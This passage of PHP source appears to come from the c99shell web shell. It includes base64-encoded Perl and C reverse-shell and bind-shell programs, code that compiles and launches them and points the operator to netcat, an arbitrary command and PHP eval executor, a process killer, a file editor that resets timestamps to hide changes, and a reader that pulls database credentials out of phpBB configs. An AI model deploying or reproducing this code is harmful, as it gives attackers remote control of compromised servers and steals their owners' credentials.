+"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy". +"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K". +"fQ==", + +"c99sh_backconn.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ". +"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ". +"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ". +"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L". +"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd". +"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka". +"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO". +"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR". +"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK". +"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==", + +"c99sh_backconn.c"=> +"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l". +"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk". +"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk". +"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g". +"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh". +"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy". +"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg". +"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1". +"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0". +"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo". +"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi". 
+"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==" +); + + $bndportsrcs = array( +"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), +"c99sh_bindport.c"=>array("Using C","%path %port %pass") +); + + $bcsrcs = array( +"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), +"c99sh_backconn.c"=>array("Using C","%path %host %port") +); + + if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";} + else + { + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;} + if (empty($bind[pass])) {$bind[pass] = $bindport_pass;} + if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;} + if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;} + if (!empty($bindsubmit)) + { + echo "<b>Result of binding port:</b><br>"; + $v = $bndportsrcs[$bind[src]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $srcpath = $tmpdir.$bind[src]; + $w = explode(".",$bind[src]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + else + { + $data = base64_decode($bndsrcs[$bind[src]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind[port],$v[1]); + $v[1] = str_replace("%pass",$bind[pass],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); //Timeout + $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! 
I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind[port]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind[port]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";} + } + echo "<br>"; + } + } + if (!empty($bcsubmit)) + { + echo "<b>Result of back connection:</b><br>"; + $v = $bcsrcs[$bc[src]]; + if (empty($v)) {echo "Unknown file!<br>";} + else + { + $srcpath = $tmpdir.$bc[src]; + $w = explode(".",$bc[src]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + else + { + $data = base64_decode($bndsrcs[$bind[src]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc[host],$v[1]); + $v[1] = str_replace("%port",$bc[port],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".$bc[host].":".$bc[port]."...<br>"; + } + } + } + ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? 
echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[port]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind[pass]); ?>">&nbsp;<select name="bind[src]"><?php +foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind[src]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form> +<b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[host]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc[port]); ?>">&nbsp;<select name="bc[src]"><?php +foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc[src]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form> +Click "Connect" only after open port for it. 
You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php + } +} +if ($act == "cmd") +{ + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + myshellexec($cmd); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($cmd_txt) + { + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret;} + } + else + { + if ($cmd_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + myshellexec($cmd); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +if ($act == "ps_aux") +{ + echo "<b>Processes:</b><br>"; + if ($win) {echo "This function not work in Windows!<br><br>";} + else + { + if ($pid) + { + if (!$sig) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + $ret = posix_kill($pid,$sig); + if ($ret) {echo "ok. he is dead, amen.";} + else {echo "ERROR. 
Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "Can't execute \"ps -aux\"!";} + else + { + $ret = htmlspecialchars($ret); + $ret = str_replace(" "," ",$ret); + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $prcs = explode("\n",$ret); + $head = explode(" ",$prcs[0]); + $head[] = "ACTION"; + unset($prcs[0]); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + echo "<tr border=\"1\">"; + foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";} + echo "</tr>"; + foreach ($prcs as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";} + echo "</tr>"; + } + } + echo "</table>"; + } + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret;} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "<form method=\"POST\"><textarea 
name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + $r = @file_get_contents($d.$f); + if (!is_readable($d.$f) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( +array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), +array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), +array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), +array("Code","code"), +array("Session","phpsess"), +array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), +array("SDB","sdb"), +array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), +array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), +array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), +array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), +array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") +); + echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." 
(".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + if (is_writable($d.$f)) {echo "<font color=\"green\">full read/write access (".view_perms(fileperms($d.$f)).")</font>";} + else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";} + echo "</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else + { + echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>"; + } + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b>"; + echo "<table class=tab border=0 cellspacing=1 cellpadding=2>"; + echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>"; + echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr class=tr><td><b>Owner/Group</b></td><td> "; + $tmp=posix_getpwuid(fileowner($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." "; + else echo $tmp['name']." 
"; + $tmp=posix_getgrgid(filegroup($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f); + else echo $tmp['name']; + } + echo "<tr class=tr><td><b>Perms</b></td><td>"; + + if (is_writable($d.$f)) + { + echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>"; + } + else + { + echo "<font>".view_perms(fileperms($d.$f))."</font>"; + } + + echo "</td></tr>"; + echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>"; + echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>"; + echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>"; + echo "</table><br>"; + + + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) + { + echo "<b>FULL HEXDUMP</b>"; + $str=fread($fi,filesize($d.$f)); + } + else + { + echo "<b>HEXDUMP PREVIEW</b>"; + $str=fread($fi,$hexdump_lines*$hexdump_rows); + } + $n=0; + $a0="00000000<br>"; + $a1=""; + $a2=""; + for ($i=0; $i<strlen($str); $i++) + { + $a1.=sprintf("%02X",ord($str[$i])).' '; + switch (ord($str[$i])) + { + case 0: $a2.="<font class=s2>0</font>"; break; + case 32: + case 10: + case 13: $a2.="&nbsp;"; break; + default: $a2.=htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";} + $a1.="<br>"; + $a2.="<br>"; + } + } + //if ($a1!="") {$a0.=sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ". + "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>". 
+ "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode($r); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode($r)); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode($r); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> + <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> + <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> + <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> + <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> + <P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {exit;} + } + elseif ($ft == "txt") + { + echo "<pre>".htmlspecialchars($r)."</pre>"; + } + elseif ($ft == "ini") + { + echo "<pre>"; + var_dump(parse_ini_file($d.$f,true)); + echo "</pre>"; + } + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" 
value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>"; + } + elseif ($ft == "sdb") + { + echo "<pre>"; + var_dump(unserialize(base64_decode($r))); + echo "</pre>"; + } + elseif ($ft == "code") + { + if (ereg("phpBB 2.(.*) auto-generated config file",$r)) + { + $arr = explode(" +",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array( + "dbms"=>$dbms, + "dbhost"=>$dbhost, + "dbname"=>$dbname, + "dbuser"=>$dbuser, + "dbpasswd"=>$dbpasswd + ); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + + echo "</b>"; + echo "<hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">"; + if (!empty($white)) {@ob_clean();} + if ($rehtml) {$r = rehtmlspecialchars($r);} + $r = stripslashes($r); + $strip = false; + if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;} + $r = @highlight_string($r, TRUE); + if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);} + echo $r; + if (!empty($white)) {exit;} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: c99shell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo($r); + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + 
header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + if (!$white) + { + echo "<center><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: image/gif"); + echo($r); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$nfcontent); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $nfcontent; + } + } + $rows = count(explode(" +",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=".$dspact."&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +if ($act == "phpinfo") +{ + ob_end_clean(); + phpinfo(); + exit; +} +} $data = base64_decode("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"); +if ($act == "img") +{ + @ob_clean(); + + $arrimg = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC". 
+"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==", +"edit"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> 